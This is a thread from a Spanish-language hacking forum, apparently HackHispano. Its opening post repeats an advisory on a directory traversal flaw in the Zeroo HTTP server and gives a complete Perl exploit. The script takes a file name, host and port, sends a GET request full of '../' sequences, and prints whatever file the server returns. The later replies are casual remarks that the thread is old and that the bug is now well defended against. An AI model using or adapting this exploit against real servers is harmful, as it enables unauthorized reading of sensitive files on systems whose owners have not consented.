Resultados 1 al 4 de 4

Zeroo Folder Traversal Vulnerability

  1. #1 Zeroo Folder Traversal Vulnerability 
    Emeritus HH-team Avatar de TseTse
    Fecha de ingreso
    Apr 2002
    Ubicación
    Metaverso
    Mensajes
    3.284
    Descargas
    1
    Uploads
    0
    According to the vendor's web page <http://lonerunner.cfxweb.net>, Zeroo is
    a "simple, small, portable, fast HTTP server". The server is available for
    Windows, and Linux operating systems.

    A folder traversal flaw in the server may allow attackers to compromise
    sensitive information stored on the server's volume.

    #!/usr/bin/perl
    use IO::Socket;
    $pkt = "GET /../../../../../../../../../../../../../../../../../../../../%s
    HTTP/1.0\r\n\r\n";
    if (@ARGV < 2 || @ARGV > 3) {
    print STDOUT "Usage: perl $0 [filename] [host] [port=80]";
    exit;
    }
    if (@ARGV==3) {
    $port=$ARGV[2];
    } else {
    $port=80;
    }
    $f = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$ARGV[1],PeerPort=>$port);
    if (!defined($f)) {
    $err=sprintf("Cannot connect to %s on port %d",$ARGV[1],$port);
    print STDOUT $err;
    exit;
    }
    $f->autoflush(1);
    print $f $pkt;
    while (defined($line = <$f>)) {
    print STDOUT $line;
    }
    undef $f;
    ͎T͎͎s͎͎e͎͎T͎͎s͎͎e͎
     

  2. #2  
    Iniciado Avatar de nikos3194
    Fecha de ingreso
    Mar 2009
    Ubicación
    Bannana Republic
    Mensajes
    39
    Descargas
    0
    Uploads
    0
    hola Tse Tse

    yo estaba buscando info del Web Server Folder Traversal Vulnerability, en la nº2 de las hackxcracks lo comentaban para estudiar el interprete/traductor Unicode en la seccion de CODE-DECODE BUG, x lo que veo es un Servidor HTTP

    para eso me utilizaba mejor el WebWeaver xD

    saliendo del chiste, ¿el codigo que agregastes es el famoso bug que tiene Zeroo para atacar desde la "carpeta trasnversal" que falla? O_o

    pues soy algo novato aun, asi que me cuesta enterder el tema, pero = gracias x la info

    PD: la pagina de http://lonerunner.cfxweb.net que agregastes no funciona +
     

  3. #3  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    wow! acabas de responder a un post con casi siete años!

    Por cierto, ese bug fue muy famoso y hoy día cualquier servidor web que se precie implementa medidas de protección al respecto.

    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
     

  4. #4  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.773
    Descargas
    31
    Uploads
    8
    Pedazo de record........ desde los albores de Hackhispano......
     

Temas similares

  1. Problema con hide folder xp
    Por cubanita08 en el foro APLICACIONES
    Respuestas: 1
    Último mensaje: 09-09-2008, 01:39
  2. Folder.htt
    Por eduar_do en el foro WINDOWS
    Respuestas: 5
    Último mensaje: 07-04-2008, 22:34
  3. Hide folder xp (Ayuda)
    Por ADM11 en el foro INGENIERIA INVERSA
    Respuestas: 9
    Último mensaje: 06-05-2007, 13:40
  4. TFTPD32 Directory Traversal Vulnerability
    Por TseTse en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 21-11-2002, 00:27
  5. Remote Buffer Overflow vulnerability in Zeroo HTTP Server
    Por TseTse en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 21-11-2002, 00:17

Marcadores

Marcadores